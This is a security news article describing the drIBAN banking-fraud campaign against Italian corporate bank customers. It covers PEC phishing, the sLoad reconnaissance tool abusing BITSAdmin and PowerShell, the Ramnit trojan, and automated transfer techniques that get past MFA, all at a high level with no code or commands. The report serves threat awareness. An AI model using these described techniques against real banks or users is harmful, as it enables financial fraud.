A new financial fraud campaign targeting Italian corporate banking customers has been identified since at least 2019. The campaign uses a new web-inject toolkit called drIBAN, capable of altering beneficiary account details during financial transactions. This allows the fraudsters to pocket the transferred amount into illegitimate bank accounts.
A deeper look into the fraud campaign
Cleafy researchers reported that the campaign started targeting Italian Corporate Banks in 2019, and then stopped in 2020. In 2021, a new campaign was observed hitting thousands of victims and is believed to be ongoing to date.
- Over the course of four years, the operators have gradually enhanced their tactics in several aspects, including better social engineering tactics and maintaining a foothold in the targeted network for a longer duration while avoiding detection.
- The attackers often use the Automated Transfer System (ATS) technique to bypass the anti-fraud security systems, such as MFA and SCA, used by banks.
- The drIBAN fraud operations target Windows workstations in the banks, attempting to replace legitimate bank details with those of accounts controlled by the attackers or their affiliates.
The attack chain
The attack begins with a certified email or PEC (a special type of email used in Italy as a legal equivalent of registered mail) in an attempt to fool potential victims.
- These phishing emails carry an executable file, designed to download the sLoad, a PowerShell-based reconnaissance tool, onto the infected computer.
- sLoad collects system information and exfiltrates it for further analysis of the infected machine. It leverages Living-off-the-land (LotL) techniques that abuse genuine tools such as BITSAdmin and PowerShell.
- If the target is found profitable, the Ramnit banking trojan is dropped as the next stage payload.
Ending notes
Operators of the drIBAN campaign are using ATS and LotL techniques, making them almost invisible to traditional signature-based security systems. Moreover, with its slow-and-steady approach to improving tactics further, the toolkit could soon turn into a nightmare for security agencies. To stay protected, organizations are suggested to be well aware of the evolving threats and make continuous efforts to enhance their security posture.
Publisher
/https://cyware-ent.s3.amazonaws.com/image_bank/dc08_shutterstock_2190600601.jpg)
/https://cyware-ent.s3.amazonaws.com/image_bank/f4d7_shutterstock_1242117157_2.jpg)
